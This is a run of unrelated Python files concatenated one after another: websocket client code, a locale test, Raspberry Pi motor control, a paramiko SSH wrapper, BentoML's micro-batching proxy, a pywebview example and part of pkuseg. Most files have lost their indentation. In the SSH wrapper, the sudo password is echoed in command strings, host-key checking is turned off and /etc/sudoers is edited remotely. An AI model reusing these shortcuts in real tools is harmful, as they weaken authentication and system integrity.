self.ws_client.on_open = self._on_open
self.ws_client.run_forever()
def send(self, message):
self.ws_client.send(json.dumps(message))
def close(self):
self.ws_client.close()
def _on_close(self, ws):
self.is_closed = True
def _on_error(self, ws, error):
print(error)
def _on_open(self, ws):
self.is_closed = False
# self.ws_client.send(json.dumps({'action': 'subscribe', 'book': 'btc_mxn', 'type': 'orders'}))
# for channel in self.channels:
# self.ws_client.send(json.dumps({'action': 'subscribe', 'book': self.book, 'type': channel}))
# self.listener.on_connect()
def _on_message(self, ws, m):
if self._print is False:
self.exchange_client.websocket_handler(json.loads(m))
else:
print(m)
|
test_i18n.py
|
import threading
from goodboy.i18n import get_current_locale, set_process_locale, set_thread_locale
def test_set_process_locale():
set_process_locale(["process_locale_name"])
assert get_current_locale() == ["process_locale_name"]
def test_set_thread_locale():
set_process_locale(["main_thread_locale"])
child_locales = {}
def child_thread_target():
child_locales["before"] = get_current_locale()
set_thread_locale(["child_thread_locale"])
child_locales["after"] = get_current_locale()
child_thread = threading.Thread(target=child_thread_target)
child_thread.start()
child_thread.join()
assert get_current_locale() == ["main_thread_locale"]
assert child_locales["before"] == ["main_thread_locale"]
assert child_locales["after"] == ["child_thread_locale"]
|
motors.py
|
import RPi.GPIO as GPIO
import time
import threading
usleep = lambda x: time.sleep(x/1000.0/1000.0)
coordToSteps = 2000.0 / 6.0
RESET_POS = [-0.22, -0.64] # 6.6cm/grid -4cm/6.6=-0.6, -1.5cm/6.6=-0.22
# Mot1 on board, Mot2 below
dirPin = [29,33]
stepPin = [31,35]
sleepPin = [32,36]
triggerPin = [16,40]
triggerSet = [False, False]
delay = 1800.0
stop = False
def daemon():
c = 0
while not stop:
time.sleep(0.01)
if GPIO.input(triggerPin[0]) == 1:
c += 1
else:
c = 0
if c == 5:
triggerSet[0] = True
def trigger1(channel):
triggerSet[1]=True
def move(steps):
for j in range(2):
GPIO.output(dirPin[j], GPIO.HIGH if steps[j]<0 else GPIO.LOW)
if not steps[j] == 0:
GPIO.output(sleepPin[j], GPIO.HIGH)
steps[j] = abs(steps[j])
time.sleep(0.15)
for i in range(max(steps[0], steps[1])):
for j in range(2):
if i>=steps[j]:
continue
GPIO.output(stepPin[j], GPIO.HIGH)
usleep(1)
GPIO.output(stepPin[j], GPIO.LOW)
t = 400.0 #steps until full speed
d_start = 4000.0 #start delay
f_i = (d_start-delay)/(t*t) * (i-t)*(i-t) + delay #calc delay
usleep(f_i if i < t else delay)
time.sleep(0.1)
for j in range(2):
GPIO.output(sleepPin[j], GPIO.LOW)
GPIO.setmode(GPIO.BOARD)
# Initialize to LOW
for pin in [dirPin, stepPin, sleepPin]:
GPIO.setup(pin, GPIO.OUT, initial=GPIO.LOW)
GPIO.setup(triggerPin[0], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
GPIO.setup(triggerPin[1], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
d = threading.Thread(name='Daemon', target=daemon)
d.daemon = True
d.start() # Event detect doesn't work because of fluctuations
GPIO.add_event_detect(triggerPin[1], GPIO.RISING, callback=trigger1)
posx = 0
posy = 0
def goTo(tx, ty):
global posx, posy
x = int((tx - posx) * coordToSteps)
y = int((ty - posy) * coordToSteps)
print("Moving from " + str((posx,posy)) + " to " + str((tx,ty)))
move([x,y])
posx = tx # Must be in simple coordinate system!
posy = ty
def reset():
goTo(RESET_POS[0], RESET_POS[1])
global posx, posy
posx = RESET_POS[0]
posy = RESET_POS[1]
triggerSet[0] = (GPIO.input(triggerPin[0]) == 1)
while not triggerSet[0]:
xy = [-10, 0]
move(xy)
triggerSet[1] = (GPIO.input(triggerPin[1]) == 1)
while not triggerSet[1]:
xy = [0, -10]
move(xy)
def shutdown():
    global stop
    GPIO.output(sleepPin[0], GPIO.LOW)
    GPIO.output(sleepPin[1], GPIO.LOW)
    stop = True
|
sshshell.py
|
"""
SSH shell implementation.
"""
import logging
import select
import socket
import StringIO
import subprocess
import threading
import time
import uuid
import paramiko
from scp import SCPClient
from jammy.exceptions import JammyError, CommandError, CommandTimeout, SshError
from jammy.waituntil import retry_on_exception
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logging.getLogger("paramiko").setLevel(logging.WARNING)
CHUNK_SIZE = 4096
RETRY_TIMEOUT_S = 15
def _maybe_add_password(command, password):
"""
Add sudo password to command if required. Else NOOP.
in: sudo apt-get install
out: echo 'password' | sudo -S apt-get install
"""
if not password or 'sudo' not in command: # or 'sudo -S' in command:
return command
# Handle commands that are chained with &&
blocks = command.split('&&')
def fix_block(block):
"""Adds sudo and password where needed"""
if 'sudo' in block and 'sudo -S' not in block:
# Split the command string into a list of words
words = block.split()
for i, word in enumerate(words):
if word == 'sudo':
words.insert(i + 1, '-S')
break
words.insert(0, "echo '%s' |" % password)
return ' '.join(words)
return block
fixed_blocks = [fix_block(block) for block in blocks]
return '&&'.join(fixed_blocks)
class SshShell(object):
"""Wrapper class around paramiko."""
def __init__(self,
host,
user='ubuntu',
password='',
private_key_path=None,
port=22):
"""
Initializer.
:param host: host/ip to ssh into
:param user: username to log in with
:param password: password to log in with
:param private_key_path: path to the private key
:param port: port number to connect to
"""
# Hostname shell connects to
self.host = host
# Port shell connects to
self.port = port
# Username shell connects with
self.user = user
# Password shell connects with
self.password = password
# Private key shell connects with
self.private_key_path = private_key_path
# The underlying paramiko ssh client
self.ssh_client = None
# paramiko.Transport object
self.transport = None
# sftp object to upload/download files
# from the instance
self.sftp_client = None
def connect(self, timeout=60):
"""
Start up paramiko and connects to the host.
:param timeout: an optional timeout (in seconds) for waiting for
ssh banner coming out. Defaults to 60 seconds.
:raises SshError: on other error
"""
try:
self.ssh_client = self.get_ssh_client(self.host, self.user,
sock=None, timeout=timeout,
port=self.port)
self.transport = self.ssh_client.get_transport()
self.transport.set_keepalive(30)
except Exception as e:
logger.error('Could not connect to %s:%s as user "%s". Error: %s',
self.host, self.port, self.user, e)
self.disconnect()
raise
def disconnect(self):
"""Disconnect from the host."""
if self.transport:
self.transport.close()
if self.ssh_client:
self.ssh_client.close()
# Clear these to make sure we get a clean reconnect
self.ssh_client = None
self.transport = None
def get_end_time(self, timeout):
        # no timeout means never time out
if not timeout:
return time.time() + float("inf")
return time.time() + timeout
def _forwarder(self, host, port):
""" Trivial forwarder. We only support 1 session at a time.
"""
while True:
chan = None
while chan is None:
chan = self.transport.accept(5)
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as e:
logger.error('forwarding request to %s:%d failed: %r' %
(host, port, e))
chan.close()
continue
logger.debug('Tunnel open %r -> %r -> %r' % (chan.origin_addr,
chan.getpeername(), (host, port)))
while True:
r, w, x = select.select([sock, chan], [], [])
if sock in r:
data = sock.recv(16384)
if len(data) == 0:
break
chan.sendall(data)
if chan in r:
data = chan.recv(16384)
if len(data) == 0:
break
sock.sendall(data)
chan.close()
sock.close()
logger.debug('Tunnel closed from %r', chan.origin_addr)
def forward_remote(self, lport, address):
""" Forward port 'lport' on the host we're connected to with
SSH to a remote server at 'address', where 'address' is a
standard '(host, port)' tuple.
If 'address' is None, return the transport to accept on.
Otherwise, start a thread that connects the transport to
the remote server.
"""
if (not self.transport) or (not self.transport.is_active()):
self.connect()
self.transport.request_port_forward('', lport)
if address is None:
return self.transport
thr = threading.Thread(target=self._forwarder, args=address)
thr.setDaemon(True)
thr.start()
return None
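    # Usage sketch (hypothetical endpoints): ask the remote host to listen on port 8080
    # and tunnel those connections back to a service running locally on port 8000:
    #
    #     shell = SshShell('203.0.113.10', user='ubuntu', password='...')
    #     shell.connect()
    #     shell.forward_remote(8080, ('127.0.0.1', 8000))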
def _read_channel(self, channel, stdout, stderr):
"""Read the channels stdout and stderr until there is no more data"""
while True:
stdout_data = None
stderr_data = None
if channel.recv_ready():
stdout_data = channel.recv(CHUNK_SIZE)
stdout.write(stdout_data)
if channel.recv_stderr_ready():
stderr_data = channel.recv_stderr(CHUNK_SIZE)
stderr.write(stderr_data)
if not stdout_data and not stderr_data:
break
def _exec_command(self, channel, command, timeout):
"""Executes the command on the given channel
:raises CommandTimeout: on command timeout
:raises socket.timeout: on channel timeout
:return: output, exit_code
"""
end_time = self.get_end_time(timeout)
channel.exec_command(command)
stdout = StringIO.StringIO()
stderr = StringIO.StringIO()
# Read until we time out or the channel closes
while time.time() < end_time:
self._read_channel(channel, stdout, stderr)
if channel.exit_status_ready():
break
if int(time.time()) % 60 == 0:
logging.info('Still waiting for command "%s"', command)
time.sleep(1)
self._read_channel(channel, stdout, stderr)
if not channel.exit_status_ready():
raise CommandTimeout(
'Command "%s" timed out after %d seconds. Output so far: '
'(%s,%s)' % (command, timeout, stdout.getvalue(),
stderr.getvalue()))
exit_status = channel.recv_exit_status()
# recv_exit_status might flush out some more data to the output
# according to the paramiko documentation
self._read_channel(channel, stdout, stderr)
return stdout.getvalue(), stderr.getvalue(), exit_status
def exec_command(self, command, timeout=120, except_on_error=False):
"""
Execute the given command.
This is for a single command only, no
shell is running, so an exec_command cannot use environment variables
or directory changes etc. from a previous exec_command.
:param command: command to send
:param timeout: seconds to wait for command to finish. None to disable
:param except_on_error: If True, throw a CommandError exception if
the command returns a non-zero return code
:raises SshError: if not connected
:raises CommandError: on non-zero return code from the command and
except_on_error is True
:raises CommandTimeout: on timeout
:return: (output, exit_code) for the command.
"""
command_with_password = _maybe_add_password(command, self.password)
if command_with_password != command:
logger.info('%s:%s Executing command "%s" with password',
self.host, self.port, command)
command = command_with_password
else:
logger.info('%s:%s Executing command "%s"', self.host, self.port,
command)
# connect if ssh is not connected
if not self.transport or not self.transport.is_active():
self.connect()
channel = self._open_ssh_session(timeout)
agent = paramiko.agent.AgentRequestHandler(channel)
channel.get_pty()
# Put stderr into the same output as stdout.
channel.set_combine_stderr(True)
        output = ''
        try:
output, _, exit_status = self._exec_command(channel, command,
timeout)
except socket.timeout:
logger.exception('Channel timed out')
raise CommandTimeout(
'Command "%s" failed due to socket timeout. Output so far: '
'%s' % (command, output))
finally:
agent.close()
channel.close()
# If the command failed and the user wants an exception, throw it!
if exit_status != 0 and except_on_error:
raise CommandError('Command "%s" returned %d with the output:\n%s'
% (command, exit_status, output))
if output:
logger.info("Command output: %s", output)
else:
logger.info('Command finished without output')
return (output, exit_status)
def _open_ssh_session(self, timeout):
try:
channel = retry_on_exception(self.transport.open_session)
except:
self.disconnect()
self.connect()
channel = retry_on_exception(self.transport.open_session)
channel.settimeout(timeout)
return channel
def exec_command_separate_stdout_stderr(self, command, timeout=120,
except_on_error=False):
"""
        Execute the given command, returning stdout and stderr separately.
The reason for more or less copy pasting exec_command is that the
return type of this function is different, and it also does not
get_pty. Because of these small differences and the fact that
exec_command is used everywhere in Yolo, we want this in its own
function.
This is for a single command only, no
shell is running, so an exec_command cannot use environment variables
or directory changes etc. from a previous exec_command.
NOTE: Running with the combine_stderr flag set to False will disallow
running sudo commands in some cases, so only do this if you
really need to separate the output
:param command: command to send
:param timeout: seconds to wait for command to finish. None to disable
:param except_on_error: If True, throw a CommandError exception if
the command returns a non-zero return code
:raises SshError: if not connected
:raises CommandError: on non-zero return code from the command and
except_on_error is True
:raises CommandTimeout: on timeout
:return: (stdout, stderr, exit_code) for the command
"""
command_with_password = _maybe_add_password(command, self.password)
if command_with_password != command:
logger.info('Executing command "%s" with password', command)
command = command_with_password
else:
logger.info('Executing command "%s"', command)
# connect if ssh is not connected
if not self.transport or not self.transport.is_active():
self.connect()
channel = self._open_ssh_session(timeout)
agent = paramiko.agent.AgentRequestHandler(channel)
# Whether or not to put stdout and stdin in the same output
channel.set_combine_stderr(False)
        stdout = stderr = ''
        try:
stdout, stderr, exit_status = self._exec_command(channel, command,
timeout)
except socket.timeout:
logger.exception('Channel timed out')
raise CommandTimeout(
'Command "%s" failed due to socket timeout. Output so far: '
'(%s, %s)' % (command, stdout, stderr))
finally:
agent.close()
channel.close()
# If the command failed and the user wants an exception, throw it!
if exit_status != 0 and except_on_error:
raise CommandError(
'Command "%s" returned %d with the output:\n(%s,%s)'
% (command, exit_status, stdout, stderr))
if stdout or stderr:
logger.info("Command output: (%s,%s)", stdout, stderr)
return (stdout, stderr, exit_status)
def exec_background(self, command, except_on_error=False):
"""
Execute a command that starts a background process.
:param command: the command, should end with "&"
:param except_on_error: If True, throw a CommandError exception if
the command returns a non-zero return code
:return: (output, exit_code) for the command.
"""
# Write the command to a temporary shell script, run the script,
# then delete it. This seems to be the only reliable way to start
# a background process without hanging the ssh session.
temp_filename = str(uuid.uuid4()).split('-')[0] + '.sh'
self.exec_command(
'echo "%s" > /tmp/%s' % (command, temp_filename),
except_on_error=True
)
self.exec_command(
'nohup sh /tmp/%s' % temp_filename,
except_on_error=except_on_error
)
self.exec_command('rm /tmp/%s' % temp_filename, except_on_error=True)
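# For illustration (hypothetical command and generated file name), exec_background
# effectively runs the following three commands over SSH:
#   echo "my_server --daemon &" > /tmp/1a2b3c4d.sh
#   nohup sh /tmp/1a2b3c4d.sh
#   rm /tmp/1a2b3c4d.sh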
def get_pty(self, term='console'):
"""
Create a pseudo terminal on the instance.
This should be used over exec_command whenever a shell/tty is
necessary.
:raises SshError: if the SSH connection has not been
established.
:return: A Paramiko channel for stateful communication.
"""
if not self.is_connected():
raise SshError('Not connected!')
channel = self.transport.open_session()
channel.get_pty(term, 80, 24)
channel.invoke_shell()
channel.set_combine_stderr(True)
return channel
def is_connected(self):
"""
Check whether SSH connection is established or not.
:return: True if it is connected; returns False otherwise.
"""
if self.transport and self.transport.is_active():
return True
return False
def get_ssh_client(self,
hostname,
username,
sock=None,
timeout=60,
port=22):
"""
Return a paramiko.SSHClient instance that is connected to the
supplied hostname.
"""
ssh = paramiko.SSHClient()
ssh.load_system_host_keys("/dev/null")
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname, username=username, sock=sock,
key_filename=self.private_key_path, password=self.password,
port=port, timeout=timeout)
return ssh
def get_sftp_client(self):
"""Return a paramiko sftp client."""
if self.sftp_client is None:
self.connect()
self.sftp_client = paramiko.SFTPClient.from_transport(
self.transport)
return self.sftp_client
def upload_file(self, source_file, dest_file, timeout=60):
"""SCP upload a file from local host to remote machine."""
ssh_client = self.get_ssh_client(self.host, self.user, sock=None,
timeout=timeout, port=self.port)
transport = ssh_client.get_transport()
with SCPClient(transport) as scp_client:
scp_client.put(source_file, dest_file)
transport.close()
ssh_client.close()
def download_file(self, source_file, dest_file):
"""SCP download a file from remote host to local host."""
ssh_client = self.get_ssh_client(self.host, self.user, sock=None,
timeout=60, port=self.port)
transport = ssh_client.get_transport()
with SCPClient(transport) as scp_client:
scp_client.get(source_file, dest_file)
transport.close()
ssh_client.close()
def alt_exec_command(self, cmd, type='ssh', timeout=360, retries=1,
raise_on_error=False, username=None):
"""
Executes the given command by running ssh in a subprocess.
This is a workaround for an issue with exec_command where it times out
or crashes, seemingly at random, when many commands are executed in
parallel. One situation where this occurred frequently was running the
same benchmark with different configurations (in separate processes).
To summarize: only use this if you are running into random crashes or
freezes when SSHing in parallel. Otherwise, please use exec_command.
"""
if type != 'ssh':
raise JammyError("unknown shell")
username = username or self.user
host = username + "@" + self.host
cmd_list = ['ssh', '-tt', '-o', 'StrictHostKeyChecking=no', host, cmd]
logger.info('Executing Popen ssh command: %s', cmd_list)
for i in range(retries):
p = subprocess.Popen(cmd_list, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
end_time = time.time() + timeout
while time.time() < end_time:
if p.poll() is not None:
break
time.sleep(10)
exit_status = p.returncode
output = p.stdout.read()
if exit_status is None:
raise CommandTimeout('Command "%s" timed out after %d seconds'
% (cmd, timeout))
elif exit_status != 0:
logger.info("error executing `%s`, exit_status %d, "
"output: %s", cmd, exit_status, output)
if i < retries - 1:
logger.info("Sleeping for %d seconds before retrying",
RETRY_TIMEOUT_S)
time.sleep(RETRY_TIMEOUT_S)
else:
break
if raise_on_error:
assert exit_status == 0, 'output: %s' % (output)
return output, exit_status
def alt_exec_background(self, cmd, type='ssh', username=None):
"""
For when you want to run sudo commands in the background in the guest.
For all other background running use cases, see exec_background.
"""
if type != 'ssh':
raise JammyError("unknown shell")
(out, xc) = self.exec_command("sudo cat /etc/sudoers")
if "!requiretty" not in out:
logging.info(
"Did not find that requiretty was disabled, disabling!")
"""
We add a line to /etc/sudoers that allows us to run ssh commands
without the -tt flag. We do this because the -tt flag misbehaves
when we run commands in the background.
We add the line by first creating a script that looks like this:
#!/bin/bash
printf '\nDefaults\t!requiretty' >> /etc/sudoers
and then running that script as sudo. We can't run the printf as
sudo without saving it to a script first, because the redirection
into the read-only /etc/sudoers file would otherwise be blocked.
The command below looks so convoluted because special characters
have to be escaped once for Python and then again for the shell.
We run the script and make sure to remove it afterwards.
"""
self.exec_command(
"printf \"#\"'!'\"/bin/bash\\nprintf '\\\\\\nDefaults"
"\\\\\\t\"'!'\"requiretty\\\\\\n' >> /etc/sudoers\\n\""
" > tmp.sh && sudo sh tmp.sh && rm tmp.sh")
username = username or self.user
host = username + "@" + self.host
cmd = ('sudo -b nohup bash -c "{ %s; } < /dev/null 2>&1 >> '
'background_output.log"' % cmd)
cmd_list = ['ssh', '-o', 'StrictHostKeyChecking=no', host, cmd]
logging.info('Executing Popen ssh command: %s', cmd_list)
subprocess.Popen(cmd_list, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
|
marshal.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import logging
import multiprocessing
import time
import traceback
import aiohttp
import aiohttp.web
import psutil
from dependency_injector.wiring import Provide, inject
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import RemoteException
from bentoml.marshal.dispatcher import CorkDispatcher, NonBlockSema
from bentoml.marshal.utils import DataLoader, MARSHAL_REQUEST_HEADER
from bentoml.saved_bundle import load_bento_service_metadata
from bentoml.saved_bundle.config import DEFAULT_MAX_BATCH_SIZE, DEFAULT_MAX_LATENCY
from bentoml.tracing import get_tracer
from bentoml.types import HTTPRequest, HTTPResponse
logger = logging.getLogger(__name__)
def metrics_patch(cls):
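# Class decorator: returns a subclass of `cls` that records Prometheus metrics
# (batch size, request duration, in-progress gauge, exception and request counters)
# around request dispatching, without otherwise changing the marshal service API.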
class _MarshalService(cls):
@inject
def __init__(
self,
*args,
namespace: str = Provide[
BentoMLContainer.config.bento_server.metrics.namespace
],
**kwargs,
):
for attr_name in functools.WRAPPER_ASSIGNMENTS:
try:
setattr(self.__class__, attr_name, getattr(cls, attr_name))
except AttributeError:
pass
from prometheus_client import Counter, Gauge, Histogram
super(_MarshalService, self).__init__(*args, **kwargs)
# its own namespace?
service_name = self.bento_service_metadata_pb.name
self.metrics_request_batch_size = Histogram(
name=service_name + '_mb_batch_size',
documentation=service_name + "microbatch request batch size",
namespace=namespace,
labelnames=['endpoint'],
)
self.metrics_request_duration = Histogram(
name=service_name + '_mb_request_duration_seconds',
documentation=service_name + "API HTTP request duration in seconds",
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
self.metrics_request_in_progress = Gauge(
name=service_name + "_mb_request_in_progress",
documentation='Total number of HTTP requests in progress now',
namespace=namespace,
labelnames=['endpoint', 'http_method'],
)
self.metrics_request_exception = Counter(
name=service_name + "_mb_request_exception",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'exception_class'],
)
self.metrics_request_total = Counter(
name=service_name + "_mb_request_total",
documentation='Total number of HTTP requests',
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
async def request_dispatcher(self, request):
func = super(_MarshalService, self).request_dispatcher
api_route = request.match_info.get("path", "/")
_metrics_request_in_progress = self.metrics_request_in_progress.labels(
endpoint=api_route, http_method=request.method,
)
_metrics_request_in_progress.inc()
time_st = time.time()
try:
resp = await func(request)
except asyncio.CancelledError:
resp = aiohttp.web.Response(status=503)
except Exception as e: # pylint: disable=broad-except
self.metrics_request_exception.labels(
endpoint=api_route, exception_class=e.__class__.__name__
).inc()
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(status=500)
self.metrics_request_total.labels(
endpoint=api_route, http_response_code=resp.status
).inc()
self.metrics_request_duration.labels(
endpoint=api_route, http_response_code=resp.status
).observe(time.time() - time_st)
_metrics_request_in_progress.dec()
return resp
async def _batch_handler_template(self, requests, api_route):
func = super(_MarshalService, self)._batch_handler_template
self.metrics_request_batch_size.labels(endpoint=api_route).observe(
len(requests)
)
return await func(requests, api_route)
return _MarshalService
@metrics_patch
class MarshalService:
"""
MarshalService creates a reverse proxy server in front of the actual API
server, implementing the micro-batching feature.
It waits for a short period, packs multiple requests into a single batch,
and then sends the batch to the API server.
It applies an optimized CORK algorithm for best efficiency.
"""
@inject
def __init__(
self,
bento_bundle_path,
outbound_host="localhost",
outbound_port=None,
outbound_workers: int = Provide[BentoMLContainer.api_server_workers],
mb_max_batch_size: int = Provide[
BentoMLContainer.config.bento_server.microbatch.max_batch_size
],
mb_max_latency: int = Provide[
BentoMLContainer.config.bento_server.microbatch.max_latency
],
max_request_size: int = Provide[
BentoMLContainer.config.bento_server.max_request_size
],
outbound_unix_socket: str = None,
enable_microbatch: bool = Provide[
BentoMLContainer.config.bento_server.microbatch.enabled
],
):
self._client = None
self.outbound_unix_socket = outbound_unix_socket
self.outbound_host = outbound_host
self.outbound_port = outbound_port
self.outbound_workers = outbound_workers
self.mb_max_batch_size = mb_max_batch_size
self.mb_max_latency = mb_max_latency
self.batch_handlers = dict()
self._outbound_sema = None # the semaphore to limit outbound connections
self.max_request_size = max_request_size
self.bento_service_metadata_pb = load_bento_service_metadata(bento_bundle_path)
if enable_microbatch:
self.setup_routes_from_pb(self.bento_service_metadata_pb)
if psutil.POSIX:
import resource
self.CONNECTION_LIMIT = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
self.CONNECTION_LIMIT = 1024
logger.info(
"Your system nofile limit is %d, which means each instance of microbatch "
"service is able to hold this number of connections at same time. "
"You can increase the number of file descriptors for the server process, "
"or launch more microbatch instances to accept more concurrent connection.",
self.CONNECTION_LIMIT,
)
def set_outbound_port(self, outbound_port):
self.outbound_port = outbound_port
def fetch_sema(self):
if self._outbound_sema is None:
self._outbound_sema = NonBlockSema(self.outbound_workers)
return self._outbound_sema
def get_client(self):
if self._client is None:
jar = aiohttp.DummyCookieJar()
if self.outbound_unix_socket:
conn = aiohttp.UnixConnector(path=self.outbound_unix_socket,)
else:
conn = aiohttp.TCPConnector(limit=30)
self._client = aiohttp.ClientSession(
connector=conn, auto_decompress=False, cookie_jar=jar,
)
return self._client
def __del__(self):
if getattr(self, '_client', None) is not None and not self._client.closed:
self._client.close()
def add_batch_handler(self, api_route, max_latency, max_batch_size):
'''
Params:
* max_latency: limit the max latency of overall request handling
* max_batch_size: limit the max batch size for the handler
** the marshal server prioritizes meeting these limits over efficiency
'''
if api_route not in self.batch_handlers:
_func = CorkDispatcher(
max_latency,
max_batch_size,
shared_sema=self.fetch_sema(),
fallback=aiohttp.web.HTTPTooManyRequests,
)(functools.partial(self._batch_handler_template, api_route=api_route))
self.batch_handlers[api_route] = _func
def setup_routes_from_pb(self, bento_service_metadata_pb):
for api_pb in bento_service_metadata_pb.apis:
if api_pb.batch:
max_latency = (
self.mb_max_latency or api_pb.mb_max_latency or DEFAULT_MAX_LATENCY
)
max_batch_size = (
self.mb_max_batch_size
or api_pb.mb_max_batch_size
or DEFAULT_MAX_BATCH_SIZE
)
self.add_batch_handler(api_pb.route, max_latency, max_batch_size)
logger.info(
"Micro batch enabled for API `%s` max-latency: %s"
" max-batch-size %s",
api_pb.route,
max_latency,
max_batch_size,
)
async def request_dispatcher(self, request):
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name="[1]http request",
is_root=True,
standalone=True,
sample_rate=0.001,
):
api_route = request.match_info.get("path")
if api_route in self.batch_handlers:
req = HTTPRequest(
tuple((k.decode(), v.decode()) for k, v in request.raw_headers),
await request.read(),
)
try:
resp = await self.batch_handlers[api_route](req)
except RemoteException as e:
# known remote exception
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(
status=e.payload.status,
headers=e.payload.headers,
body=e.payload.body,
)
except Exception: # pylint: disable=broad-except
logger.error(traceback.format_exc())
resp = aiohttp.web.HTTPInternalServerError()
else:
resp = await self.relay_handler(request)
return resp
async def relay_handler(self, request):
data = await request.read()
url = request.url.with_host(self.outbound_host).with_port(self.outbound_port)
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name=f"[2]{url.path} relay",
request_headers=request.headers,
):
try:
client = self.get_client()
async with client.request(
request.method, url, data=data, headers=request.headers
) as resp:
body = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError:
return aiohttp.web.Response(status=503, body=b"Service Unavailable")
return aiohttp.web.Response(
status=resp.status, body=body, headers=resp.headers,
)
async def _batch_handler_template(self, requests, api_route):
'''
batch request handler
params:
* requests: list of aiohttp request
* api_route: called API name
raise:
* RemoteException: known exceptions from model server
* Exception: other exceptions
'''
headers = {MARSHAL_REQUEST_HEADER: "true"}
api_url = f"http://{self.outbound_host}:{self.outbound_port}/{api_route}"
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name=f"[2]merged {api_route}",
request_headers=headers,
):
reqs_s = DataLoader.merge_requests(requests)
try:
client = self.get_client()
async with client.post(api_url, data=reqs_s, headers=headers) as resp:
raw = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError as e:
raise RemoteException(
e, payload=HTTPResponse(status=503, body=b"Service Unavailable")
)
if resp.status != 200:
raise RemoteException(
f"Bad response status from model server:\n{resp.status}\n{raw}",
payload=HTTPResponse(
status=resp.status,
headers=tuple(resp.headers.items()),
body=raw,
),
)
merged = DataLoader.split_responses(raw)
return tuple(
aiohttp.web.Response(
body=i.body, headers=i.headers, status=i.status or 500
)
for i in merged
)
def async_start(self, port):
"""
Start a micro-batch server on the given port, in a daemonized child process.
"""
marshal_proc = multiprocessing.Process(
target=self.fork_start_app, kwargs=dict(port=port), daemon=True,
)
marshal_proc.start()
logger.info("Running micro batch service on :%d", port)
def make_app(self):
app = aiohttp.web.Application(client_max_size=self.max_request_size)
app.router.add_view("/", self.relay_handler)
app.router.add_view("/{path:.*}", self.request_dispatcher)
return app
@inject
def fork_start_app(
self, port=Provide[BentoMLContainer.config.bento_server.port],
):
# Use new eventloop in the fork process to avoid problems on MacOS
# ref: https://groups.google.com/forum/#!topic/python-tornado/DkXjSNPCzsI
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
app = self.make_app()
aiohttp.web.run_app(app, port=port)
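# A minimal usage sketch (illustrative only; the bundle path and port numbers are
# assumptions, and in BentoML this wiring is normally done by the CLI):
#
#   marshal = MarshalService(
#       "/path/to/saved_bundle",
#       outbound_host="localhost",
#       outbound_port=5000,            # port of the actual API server
#   )
#   marshal.async_start(port=5001)     # micro-batch proxy listens here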
|
window_title_change.py
|
import webview
import threading
import time
'''
This example demonstrates how to change a window title.
'''
def change_title():
"""changes title every 3 seconds"""
for i in range(1, 100):
time.sleep(3)
webview.set_title("New Title #{}".format(i))
if __name__ == '__main__':
t = threading.Thread(target=change_title)
t.start()
webview.create_window('First Tile',
'http://www.flowrl.com',
width=800, height=600,
resizable=True)
|
__init__.py
|
from __future__ import print_function
import sys
if sys.version_info[0] < 3:
print("pkuseg does not support python2", file=sys.stderr)
sys.exit(1)
import os
import time
import pickle as pkl
import multiprocessing
from multiprocessing import Process, Queue
import pkuseg.trainer as trainer
import pkuseg.inference as _inf
from pkuseg.config import config
from pkuseg.feature_extractor import FeatureExtractor
from pkuseg.model import Model
from pkuseg.download import download_model
from pkuseg.postag import Postag
class TrieNode:
"""建立词典的Trie树节点"""
def __init__(self, isword):
self.isword = isword
self.children = {}
class Preprocesser:
"""预处理器,在用户词典中的词强制分割"""
def __init__(self, dict_file):
"""初始化建立Trie树"""
if dict_file is None:
dict_file = []
self.dict_data = dict_file
if isinstance(dict_file, str):
with open(dict_file, encoding="utf-8") as f:
lines = f.readlines()
self.trie = TrieNode(False)
for line in lines:
self.insert(line.strip())
else:
self.trie = TrieNode(False)
for w in dict_file:
assert isinstance(w, str)
self.insert(w.strip())
def insert(self, word):
"""Trie树中插入单词"""
l = len(word)
now = self.trie
for i in range(l):
c = word[i]
if not c in now.children:
now.children[c] = TrieNode(False)
now = now.children[c]
now.isword = True
def solve(self, txt):
"""对文本进行预处理"""
outlst = []
iswlst = []
l = len(txt)
last = 0
i = 0
while i < l:
now = self.trie
j = i
found = False
while True:
c = txt[j]
if not c in now.children:
break
now = now.children[c]
j += 1
if now.isword:
found = True
break
if j == l:
break
if found:
if last != i:
outlst.append(txt[last:i])
iswlst.append(False)
outlst.append(txt[i:j])
iswlst.append(True)
last = j
i = j
else:
i += 1
if last < l:
outlst.append(txt[last:l])
iswlst.append(False)
return outlst, iswlst
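# Example (hypothetical user dictionary containing "北京大学"):
#   Preprocesser(["北京大学"]).solve("北京大学的学生")
#   -> (["北京大学", "的学生"], [True, False])
# i.e. dictionary words are cut out as fixed segments, and only the remaining
# pieces are passed on to the statistical model.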
class Postprocesser:
"""对分词结果后处理"""
def __init__(self, common_name, other_names):
if common_name is None and other_names is None:
self.do_process = False
return
self.do_process = True
if common_name is None:
self.common_words = set()
else:
# with open(common_name, encoding='utf-8') as f:
# lines = f.readlines()
# self.common_words = set(map(lambda x:x.strip(), lines))
with open(common_name, "rb") as f:
all_words = pkl.load(f).strip().split("\n")
self.common_words = set(all_words)
if other_names is None:
